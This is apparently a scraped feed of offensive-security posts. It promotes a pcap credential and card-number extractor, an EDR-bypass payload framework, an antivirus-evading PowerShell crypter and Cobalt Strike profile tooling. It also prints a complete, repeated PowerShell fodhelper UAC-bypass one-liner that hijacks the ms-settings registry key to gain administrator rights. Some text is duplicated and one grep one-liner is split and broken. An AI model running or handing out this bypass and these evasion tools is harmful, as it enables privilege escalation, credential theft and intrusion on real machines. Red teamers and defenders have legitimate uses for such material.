Pcredz 2.0.2 has been released; added IPv6 support, increased pcap parsing speed x8-10. Now extracts all credentials from a 1Go pcap file in ~2 minutes. This version also includes hash dump in txt files.
Get the latest version here:
https://github.com/lgandx/PCredz
Get the latest version here:
https://github.com/lgandx/PCredz
GitHub
GitHub - lgandx/PCredz: This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth…
This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interfa...
TrickBot Crews New CobaltStrike Loader | by Jason Reaves | Walmart Global Tech Blog | Apr, 2021 | Medium
https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c
https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c
Medium
TrickBot Crews New CobaltStrike Loader
By: Jason Reaves and Joshua Platt
GitHub - optiv/ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.
https://github.com/optiv/ScareCrow
https://github.com/optiv/ScareCrow
GitHub
GitHub - optiv/ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.
ScareCrow - Payload creation framework designed around EDR bypass. - optiv/ScareCrow
GitHub - Porchetta-Industries/pyMalleableC2: Python interpreter for Cobalt Strike Malleable C2 Profiles. Allows you to parse, build and modify them programmatically.
https://github.com/Porchetta-Industries/pyMalleableC2
https://github.com/Porchetta-Industries/pyMalleableC2
GitHub
GitHub - byt3bl33d3r/pyMalleableC2: Python interpreter for Cobalt Strike Malleable C2 Profiles. Allows you to parse, build and…
Python interpreter for Cobalt Strike Malleable C2 Profiles. Allows you to parse, build and modify them programmatically. - byt3bl33d3r/pyMalleableC2
UAC bypass in 2 lines:
cmd -> fodhelper
PoC||GTFO
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
cmd -> fodhelper
PoC||GTFO
Get #Admin #rights #windows10, 1 string
powershell:
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force;New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force;fodhelper
powershell:
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force;New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force;fodhelper
BetterXencrypt: Powershell runtime crypter designed to evade AVs
https://securityonline.info/betterxencrypt-powershell-runtime-crypter-designed-to-evade-avs/
https://securityonline.info/betterxencrypt-powershell-runtime-crypter-designed-to-evade-avs/
Cybersecurity News
BetterXencrypt: Powershell runtime crypter designed to evade AVs
BetterXencrypt is a better version of Xencrypt.Xencrypt itself is a Powershell runtime crypter designed to evade AVs. cause Xencrypt is not FUD
Extract all endpoints from a JS File with this oneliner:)
cat files.txt | grep -aoP "(?<=(\"|\'|
cat files.txt | grep -aoP "(?<=(\"|\'|
))\/[a-zA-Z0-9?&=\/-#.](?=(\"|\'|))" | sort -u | tee output.txt